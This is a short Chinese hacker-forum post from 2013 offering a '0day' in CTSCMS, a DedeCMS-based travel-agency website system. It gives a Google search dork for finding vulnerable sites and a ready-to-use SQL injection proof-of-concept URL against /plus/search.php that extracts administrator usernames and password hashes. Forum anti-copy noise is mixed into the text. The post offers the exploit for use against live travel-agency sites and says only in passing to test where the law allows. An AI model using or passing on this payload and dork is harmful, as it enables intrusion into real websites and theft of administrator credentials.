新年多放点0day,小范围共享!
( O3 L% g& G2 r* r% [. O r中国旅游服务网站管理系统CTSCMS,这个网站系统是我在近期发现的。使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。9 O& h2 Y% n! y. [( q* y$ Q; S/ B* b
Google:2002-2011 CTSCMS.COM ,inurl:users/reg.php 旅行社( ^3 | N$ X8 i9 @0 G2 C2 U6 {
POC:/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a1 D2 b: Z/ B- i
2 P) \- c/ N( L t) b# |3 Q+ S. w# W
后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用8 S, K f1 c! o
+ E6 U& h1 h! t, S7 @) v( }
% L& l* J1 ~2 C6 m8 j! S
5 u7 k$ |3 H. B 9 d6 ?. l' U( T
* O* `5 g# F' h+ W0 I6 R
很多大型旅行社网站都在用,请在法律允许的范围内测试。 黑客保重....: G2 |; F7 l0 k- q/ J$ B
4 c3 k( v6 D6 g0 k |
发表于 2013-2-4 16:11:01
收藏
支持
反对